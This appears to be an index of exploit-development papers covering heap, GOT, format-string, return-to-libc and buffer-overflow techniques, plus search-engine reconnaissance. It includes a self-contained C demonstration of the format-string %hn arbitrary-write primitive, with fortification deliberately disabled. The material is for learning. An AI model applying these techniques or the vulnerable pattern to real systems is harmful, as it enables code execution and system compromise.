[Engineering] Paper #9: [ Winheap PEB ]: A paper on developing portable exploits for heap overflows on Windows. The Process Environment Block (PEB) lives at a predictable address and holds function pointers, so it offers a stable pointer to overwrite, which leads to execution of attacker-supplied code.
[Engineering] Paper #8: [ Binary Reconstruction ]: A very short paper that shows how useful knowing assembler is. By reading a binary's disassembly it can be quite straightforward to reconstruct the source of the application, which matters when you are not given the code, as with a commercial binary or application.
[Exploitation] Paper #7: [ Advanced Format Strings ]: A paper that discusses advanced format string exploitation in situations where the user-supplied input cannot be reached through the format string, so the usual trick of placing the target address in the input does not apply. By combining techniques it is still possible to exploit format bugs, using important application registers whose saved values sit on the stack where the format string can reach them.
[Exploitation] Paper #6: [ GOT Hijack ]: This brief text shows how overwriting a pointer turns a buffer overflow into control of execution. The Global Offset Table holds the resolved addresses of library functions in a dynamically linked program; by overwriting one entry, the application's execution flow is diverted to attacker-chosen code the next time that function is called, allowing the system to be compromised.
[Exploitation] Paper #5: [ Format Strings ]: An unfinished text I started to write a while ago to understand format string exploitation of heap-allocated user input strings. It runs over some basic examples of exploiting printf misuse and how to hijack control of the process. Maybe one day I will finish it off, but I just can't be bothered :-)
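The write primitive that both format string texts (Paper #7 and Paper #5) build on, as an added example that is not code from either paper. In a real bug the addresses written to come from attacker data on the stack (Paper #5) or from pointers the program already left there (Paper #7); here they are passed as explicit arguments to a hypothetical vulnerable_log() so the behaviour stays fully defined, and the helper fmt_write_u32() is likewise invented for the demonstration. It assumes little-endian x86 and glibc, and switches off glibc's fortification because a fortified printf aborts with "%n in writable segment detected" on exactly this primitive, which is a mitigation worth knowing about.

```c
/* Added example (not code from Paper #7 or #5): the %n write primitive both
 * format-string texts rely on. In a real bug the target addresses come from
 * attacker data on the stack (Paper #5) or from pointers the program already
 * left there (Paper #7); here they are passed as explicit arguments so the
 * behaviour is fully defined. Assumes little-endian x86 and glibc. */
#undef _FORTIFY_SOURCE          /* glibc's fortified printf aborts on %n in a
                                   writable format string, which is exactly the
                                   primitive shown here, so fortification is
                                   disabled for this file */
#undef __USE_FORTIFY_LEVEL
#define __USE_FORTIFY_LEVEL 0
#include <stdint.h>
#include <stdio.h>

/* The bug pattern: untrusted text is used as the format string. The extra
 * parameters stand in for whatever the stack holds at the call; each %x in
 * the format consumes one int and each %hn consumes one short pointer.
 * (Hypothetical function, written for this demonstration.) */
static int vulnerable_log(const char *user_fmt, int a, short *p, int b, short *q)
{
    /* BUG: user_fmt is attacker-controlled. snprintf(NULL, 0, ...) counts
     * instead of printing, but %n still writes the running count through
     * p and q, exactly as printf would. */
    return snprintf(NULL, 0, user_fmt, a, p, b, q);
}

/* Build the attacker's format string so that vulnerable_log() stores
 * `value` into the 32-bit word at *target with two 16-bit %hn writes,
 * and return the number of characters printf would have emitted.
 * (Hypothetical helper, written for this demonstration.) */
static int fmt_write_u32(uint32_t *target, uint32_t value)
{
    short *lo = (short *)target;   /* little-endian: low half at the lower address */
    short *hi = lo + 1;
    uint32_t lo_v = value & 0xffffu;
    uint32_t hi_v = value >> 16;

    /* %n stores the count of characters emitted so far, and that count only
     * grows, so the smaller half is written first and the second pad adds
     * just the difference. A %Nx emits at least one character, so a pad of
     * zero becomes 0x10000, the same count once %hn truncates to 16 bits. */
    int lo_first = lo_v <= hi_v;
    short *first_ptr  = lo_first ? lo : hi;
    short *second_ptr = lo_first ? hi : lo;
    uint32_t first_v  = lo_first ? lo_v : hi_v;
    uint32_t second_v = lo_first ? hi_v : lo_v;
    uint32_t pad1 = first_v ? first_v : 0x10000u;
    uint32_t pad2 = (second_v - first_v) ? (second_v - first_v) : 0x10000u;

    char fmt[64];
    /* value 0x08041234 -> "%2052x%hn%2608x%hn": 0x0804 is written first,
     * then 0x1234 = 0x0804 + 2608 */
    snprintf(fmt, sizeof fmt, "%%%ux%%hn%%%ux%%hn", pad1, pad2);

    return vulnerable_log(fmt, 0, first_ptr, 0, second_ptr);
}

int main(void)
{
    uint32_t target = 0xffffffffu;   /* constructed sample target word */
    int n = fmt_write_u32(&target, 0x08041234u);
    printf("target = 0x%08x after %d characters\n", target, n);
    return target == 0x08041234u ? 0 : 1;
}
```

The two-halves trick keeps the padding small (a single `%n` would need the program to emit 0x08041234 characters); the zero-half case is the edge that trips up naive versions of the exploit, since `%0x` still prints one character. What neither helper does is find the pointers in the first place: that is the part where the two papers differ.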
[Exploitation] Paper #4: [ Return-to-libc ]: Returning to libc is a method of exploiting a buffer overflow on a system with a non-executable stack. It is very similar to a standard buffer overflow in that the return address is changed to point at a new location we control; however, since no code may execute on the stack, we cannot simply drop in shellcode, so the return address is pointed at an existing libc function instead.
[Exploitation] Paper #3: [ GDB Debugging ]: This text provides some standard information on how to use GDB to debug an application during exploit development. With a debugger it is possible to see exactly what happens to an application at run-time, examining registers, memory and function arguments with common commands that help in working out how to develop an exploit.
[Data Mining] Paper #2: [ Eight Legs ]: This text introduces the reader to the potential use of Google when attacking a network. Internet search engine spiders have been partly responsible for a multitude of very successful penetrations of otherwise reasonably secure sites and networks: by using search engines it is possible to gather data from web servers that should be considered sensitive.
[Exploitation] Paper #1: [ Buffer overflows ]: This text provides information on abusing destroyed NUL terminators on the x86 Linux architecture. The example misuses strcpy(), which copies until it finds a NUL byte and so has no bound on its length; exploit code then uses the overflow to execute injected instructions. The steps and bug are based on a real-life example c0ntex found in Mplayer, though the source is different.